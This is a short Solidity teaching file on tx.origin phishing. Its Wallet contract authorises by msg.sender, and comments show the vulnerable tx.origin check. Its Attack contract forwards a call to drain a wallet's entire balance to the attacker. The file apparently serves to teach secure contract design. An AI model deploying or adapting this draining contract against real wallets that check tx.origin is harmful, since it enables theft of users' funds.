Phising.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.10;
/*
Phishing with tx.origin
- What is tx.origin?
- Contract using tx.origin
- Exploit tx.origin
- Demo
- Preventative technique
*/
/*
Alice -> A -> B (inside B: msg.sender = A,
tx.origin = Alice)
*/
/// @title Wallet
/// @notice Minimal Ether wallet used to show why authorization must be based on
///         msg.sender rather than tx.origin.
contract Wallet {
    // Account that deployed the wallet; the only caller allowed to move funds.
    address public owner;

    /// @dev Authorizes on the immediate caller.
    ///
    /// The vulnerable form of this check is
    ///     require(tx.origin == owner, "Not owner");
    /// tx.origin is the account that signed the transaction, so it is still the
    /// owner on both of these paths:
    ///     Alice -> Wallet.transfer()                              (tx.origin = Alice)
    ///     Alice -> Eve's malicious contract -> Wallet.transfer()  (tx.origin = Alice)
    /// With msg.sender the second path is rejected, because the immediate caller
    /// there is the intermediate contract and not the owner.
    modifier onlyOwner() {
        require(msg.sender == owner, "Not owner");
        _;
    }

    /// @notice Records the deployer as the wallet owner.
    constructor() public {
        owner = msg.sender;
    }

    /// @notice Accepts Ether from any caller; the balance is held by this contract.
    function deposit() public payable {}

    /// @notice Sends `_amount` wei from the wallet to `_to`. Owner only.
    /// @dev Reverts with "Not owner" for any other immediate caller and with
    ///      "Failed to send Ether" when the low-level call reports failure.
    /// @param _to Recipient of the Ether.
    /// @param _amount Amount to send, in wei.
    function transfer(address payable _to, uint _amount) public onlyOwner {
        (bool ok, ) = _to.call{value: _amount}("");
        require(ok, "Failed to send Ether");
    }

    /// @notice Returns the Ether currently held by the wallet, in wei.
    function getBalance() public view returns (uint) {
        uint held = address(this).balance;
        return held;
    }
}
/// @title Attack
/// @notice Demo counterpart to Wallet: an intermediate contract that forwards a
///         call to Wallet.transfer().
/// @dev The forwarded call can only pass an owner check written against
///      tx.origin. Wallet.transfer() as written checks msg.sender, which on this
///      path is this contract's address, so the call reverts with "Not owner"
///      unless this contract is itself the wallet owner.
contract Attack {
    // Account that deployed this contract; used as the recipient in attack().
    address payable public owner;
    // Wallet instance this contract calls into.
    Wallet wallet;

    /// @notice Stores the target wallet and records the deployer as owner.
    /// @param _wallet Wallet instance to call.
    constructor(Wallet _wallet) public {
        owner = msg.sender;
        wallet = _wallet;
    }

    /// @notice Requests a transfer of the wallet's entire balance to `owner`.
    /// @dev Callable by anyone. Inside Wallet.transfer(), msg.sender is this
    ///      contract, while tx.origin is whoever signed the outer transaction.
    function attack() public {
        uint walletBalance = address(wallet).balance;
        wallet.transfer(owner, walletBalance);
    }
}